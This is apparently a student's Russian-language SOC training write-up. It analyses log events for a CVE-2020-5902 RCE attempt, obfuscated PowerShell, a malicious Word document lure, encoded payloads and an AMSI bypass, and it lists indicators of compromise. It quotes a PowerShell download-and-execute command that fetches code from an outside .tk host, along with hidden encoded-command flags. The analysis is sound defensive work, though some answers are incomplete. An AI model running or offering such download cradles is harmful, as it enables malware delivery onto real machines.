# Мониторинг ИБ. Работа специалиста SOC 1. Задание №1 1.1 Опишите, что происходит (чего добиваются атакующие). - попытка экплуатации уязвимости CVE-2020-5902 - удаленное выполненение кода (RCE) на систему с помощью продуктов F5 BIG-IP 1.2 Выделите признаки, по которым понятно, что происходит атака. - command=wget+... 1.3 Выделите IoС'и, которые могут быть использованы для выявления подобной активности в будущем. - ..; - FGVP5 1.4 Укажите, каким образом можно удостовериться в том, удалось ли атакующим достигнуть того, чего они добивались этим запросом. - соединение установлено: Connection: keep-alive - попытка запуска командной оболочки sh 2. Задание 2 2.1 Что подозрительного в событии? - используется обфусцированный код PowerShell: - командлет Invoke-Expression, который вычисляет или выполняет указанную строку в виде команды и возвращает результаты выражения или команды - параметр "Command" со значением:New-Object, Net.WebClient, DownloadString и каким-то URL (http://...com/.../...), а также параметром System - в целом команда была примерно такая: Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://...com/.../...') 2.2 С какой целью реализовано? - для обхода сигнатурного анализа антивирусных программ 3. Задание 3 3.1. Что в этих событиях является подозрительным? - запуск PowerShell и Winword; - декодирование команды IEX (New-Object System.Net.WebClient).DownloadString('http://omni-consumer-pr0ducts.tk/favicon.ico'); - создание файла C:\Users\user\Downloads\employee termination letter.docx; - NT AUTHORITY\SYSTEM; - usgthrsvc; - запуск процессов VERCLSID.EXE, WINWORD.EXE, OSPPSVC.EXE, WmiPrvSE.exe 3.2. Какие признаки указанных событий на это указывают? - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -sta -noni -w hidden -encodedCommand - usgthrsvc - NT AUTHORITY\SYSTEM - "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\Downloads\employee termination letter.docx" - C:\Users\user\AppData\Local\Temp\severance payment form.lnk:Zone.Identifier - C:\Windows\Prefetch\VERCLSID.EXE-CD081540.pf - C:\Windows\Prefetch\WINWORD.EXE-7D220BFE.pf - C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 3.3. Какие IoC'и можно выделить из этих событий? - Nop -sta -noni -w hidden -encodedCommand - usgthrsvc - NT AUTHORITY\SYSTEM 3.4. Опишите подробно суть подозрительных действий в системе, зафиксированных в этом журнале. - совместно запускаются PowerSlhell и WINWORD; - запускается Antimalware Service Executable - процесс позволяет Защитнику Windows отслеживать потенциальные угрозы; - запуск процесса wmiprvse.exe - позволяющий программам на компьютере получать различную информацию о системе; - Nop -sta -noni -w hidden -encodedCommand с параметрами не загружать профиль текущего пользователя и окно, а в закодированном виде команда IEX с кодом для загрузки и запуска какой-то строки; - NT AUTHORITY\SYSTEM - запуск приложения под локальной учетной записью - usgthrsvc - вирус подмены страниц; - процессы VERCLSID.EXE, WINWORD.EXE, OSPPSVC.EXE - так как некоторые вирусы маскируются под них (если они расположены не в своих каталогах) - запуск процесса WmiPrvSE.exe - который позволяет программам на компьютере получать различную информацию о системе; - создание документа и ссылки на какую-то форму. 4. Задание 4 4.1 Что произошло на узле? - "text": "Обнаружена попытка выполнить потенциально опасную команду на узле larteshina.plat.form", 4.2 С помощью чего это удалось добиться? При раскодировании данных видно была попытка выполнить команду из PowerShell - раскодируем данные из "object.process.cmdline" ![](https://i.imgur.com/CSwa3U3.png) - видим что тут несколько вложенных объектов - раскодирование с помощью Gzip Decompress данные из объекта System.IO.Compression.GzipStream ![](https://i.imgur.com/JfMUGPS.png) - есть какие-то данные в [Byte[]]$mkuA = [System.Convert]::FromBase64String ![](https://i.imgur.com/pkzaRMH.png) Для дальнейшей работы пока не хватает знаний! Увы! 5. Задание 5 5.1 К какому семейству принадлежит данное ВПО? - троянские программы (Троян:Win32/Amynex.A) 5.2 Перечислите имена всех файлов, которые могли быть загружены на компьютер с помощью данного скрипта. ipc_20201126 Задание 6 6.1 Опишите, что же на самом деле произошло на компьтере пользователя. Удаленное подключение к машине пользователя, путем обхода инструмента безопасности AMSI 6.2 Укажите необходимые подробности и признаки, по которым можно выявлять подобную активность, а так же необходимые данные для осуществления мер по реагированию. Признаки: - наличие кодировки base64; - запуск консольного окна - conhost.exe; - выдача сообщения - Network connection detected Необходимые данные для осуществления мер по реагированию: - Разработка правил корреляции по имеющимся признакам.